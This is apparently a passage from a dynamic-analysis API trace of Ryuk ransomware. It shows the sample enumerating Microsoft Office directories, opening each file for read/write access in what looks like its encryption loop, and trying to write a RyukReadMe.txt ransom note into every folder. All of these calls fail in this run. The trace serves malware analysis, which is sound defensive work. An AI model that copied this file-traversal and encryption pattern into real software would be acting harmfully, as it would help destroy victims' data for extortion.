hTemplateFile=0x0) returned 0xffffffffffffffff [0137.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.190] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePage.html", dwFileAttributes=0x80) returned 0 [0137.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.190] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.190] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.190] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js", dwFileAttributes=0x80) returned 0 [0137.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagescript.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.191] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css", dwFileAttributes=0x80) returned 0 [0137.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagestyle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.192] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 0 [0137.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.192] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 0 [0137.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.193] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.193] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.193] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.193] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.194] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.194] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.194] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 0 [0137.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.194] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.194] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.194] SetLastError (dwErrCode=0x0) [0137.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.194] GetLastError () returned 0x5 [0137.194] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0137.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.194] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2d60 [0137.196] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.196] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.196] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.196] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css", dwFileAttributes=0x80) returned 0 [0137.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\adobe.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.197] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.197] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.197] SetLastError (dwErrCode=0x0) [0137.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.197] GetLastError () returned 0x5 [0137.197] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.197] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.197] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.197] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.197] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.197] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.198] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.198] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.198] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.198] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.198] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.198] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.198] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.199] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.199] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.199] SetLastError (dwErrCode=0x0) [0137.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.199] GetLastError () returned 0x5 [0137.199] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.199] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.199] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana.css", dwFileAttributes=0x80) returned 0 [0137.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Americana.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\americana.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.199] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.199] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.199] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.200] SetLastError (dwErrCode=0x0) [0137.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.200] GetLastError () returned 0x5 [0137.200] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.200] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.200] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.200] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.200] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.200] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0137.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.200] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.200] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.201] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\HEADER.GIF", dwFileAttributes=0x80) returned 0 [0137.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\HEADER.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\header.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.201] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.201] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.201] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.201] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.202] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.202] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.202] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.202] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.203] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.203] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.203] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.203] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.203] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.203] SetLastError (dwErrCode=0x0) [0137.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.203] GetLastError () returned 0x5 [0137.203] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.203] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.203] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.204] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css", dwFileAttributes=0x80) returned 0 [0137.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\BabyBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\babyblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.204] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.204] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0137.204] SetLastError (dwErrCode=0x0) [0137.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.204] GetLastError () returned 0x5 [0137.204] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0) returned 0 [0137.204] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.204] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a2dc0 [0137.205] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.205] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.205] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0137.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.205] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.205] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.205] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0137.205] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.205] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0137.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.206] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.206] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.206] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0137.206] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0137.206] SetLastError (dwErrCode=0x0) [0137.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Biscay\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\biscay\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 